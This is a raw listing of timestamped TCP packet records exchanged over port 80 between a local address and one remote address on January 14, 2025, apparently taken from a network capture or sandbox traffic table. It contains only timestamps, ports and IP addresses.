Jan 14, 2025 16:21:09.684135914 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.684144974 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.684153080 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.684154987 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.684173107 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.684187889 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.684869051 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.684880972 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.684890032 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.684900999 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.684911013 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.684914112 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.684921980 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.684931993 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.684940100 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.684942961 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.684953928 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.684953928 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.684966087 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.684976101 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.684976101 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.684993029 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.684994936 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.685003996 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.685014009 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.685014963 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.685025930 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.685034990 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.685036898 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.685048103 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.685050964 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.685060024 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.685069084 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.685072899 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.685084105 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.685094118 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.685095072 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.685106993 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.685108900 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.685117006 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.685128927 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.685131073 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.685138941 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.685148001 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.685149908 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.685162067 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.685169935 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.685173035 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.685187101 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.685204029 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.685868025 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.685880899 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.685890913 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.685902119 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.685908079 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.685913086 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.685926914 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.685930967 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.685937881 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.685945988 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.685947895 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.685960054 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.685971022 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.685970068 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.685987949 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.685988903 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.686000109 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.686005116 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.686012030 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.686022043 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.686022043 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.686033010 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.686043978 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.686044931 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.686054945 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.686063051 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.686068058 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.686078072 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.686083078 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.686089993 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.686100006 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.686104059 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.686110973 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.686120987 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.686121941 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.686132908 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.686141014 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.686144114 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.686156034 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.686162949 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.686166048 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.686177969 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.686178923 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.686202049 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.686216116 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.686820984 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.686832905 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.686842918 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.686853886 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.686863899 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.686865091 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.686876059 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.686882973 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.686886072 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.686897039 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.686903000 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.686908007 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.686918020 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.686920881 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.686937094 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.686938047 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.686949015 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.686959028 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.686961889 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.686970949 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.686978102 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.686981916 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.686996937 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.687000990 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687011957 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687016964 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.687024117 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687036037 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687036991 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.687046051 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687057018 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687058926 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.687067986 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687077045 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.687078953 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687089920 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687103987 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687109947 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.687118053 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687124014 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.687129974 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687140942 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687141895 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.687160969 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.687182903 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.687561989 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687575102 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687587023 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687599897 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687604904 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.687611103 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687622070 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687623024 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.687633038 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687644005 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687644958 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.687654972 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687663078 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.687666893 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687683105 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.687697887 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687697887 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.687709093 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687720060 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687731028 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687738895 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.687741041 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687752962 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687756062 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.687763929 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687774897 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687779903 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.687786102 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687797070 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.687799931 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687812090 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687819958 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.687823057 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.687835932 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.687858105 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.688174963 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688188076 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688199997 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688211918 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688216925 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.688224077 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688235044 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.688235044 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688246012 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688252926 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.688257933 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688268900 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688271046 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.688280106 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688286066 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.688306093 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.688313007 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688323975 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688330889 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.688334942 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688347101 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688357115 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688361883 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.688369036 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688379049 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688384056 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.688390970 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688400984 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688409090 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.688412905 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688424110 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688432932 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.688435078 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688452959 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688461065 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.688467026 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688468933 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.688477993 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688484907 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.688488960 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688499928 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688507080 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.688512087 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688522100 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688524008 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.688534021 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688544035 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688548088 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.688555002 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688565016 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688566923 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.688576937 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688585043 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.688587904 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.688605070 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.688621044 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.689032078 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.689044952 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.689055920 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.689071894 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.689074993 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.689086914 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.689090014 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.689110994 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.689125061 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.707509041 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.712320089 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.712343931 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.712354898 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.712419987 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.716945887 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.727210999 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.727226019 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.727237940 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.727247953 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.727260113 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.727263927 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.727272034 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.727283001 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.727288008 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.727294922 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.727310896 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.727334976 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.727428913 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.727441072 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.727452040 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.727471113 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.727494955 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.727509022 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.727519989 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.727530003 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.727540970 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.727552891 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.727575064 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.727602959 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.727642059 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.727674007 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.727684021 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.727694988 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.727705002 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.727715969 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.727716923 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.727727890 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.727737904 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.727761030 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.727801085 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.727813005 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.727824926 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.727834940 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.727844954 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.727849007 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.727859974 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.727868080 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.727880955 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.727893114 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.727917910 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.727968931 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.727977991 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.727984905 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.728024006 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.728040934 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.728053093 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.728064060 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.728082895 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.728092909 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.728102922 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.728106022 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.728113890 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.728125095 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.728126049 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.728148937 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.728172064 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.728334904 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.728347063 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.728358030 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.728368044 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.728375912 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.728379011 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.728389978 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.728399992 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.728400946 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.728424072 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.728427887 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.728439093 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.728444099 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.728451967 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.728461027 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.728462934 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.728473902 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.728480101 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.728485107 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.728494883 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.728497982 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.728518963 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.728535891 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.728669882 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.728681087 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.728693962 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.728708982 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.728725910 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.728832960 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.728843927 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.728853941 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.728863955 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.728874922 CET	80	49165	45.155.249.215	192.168.2.22
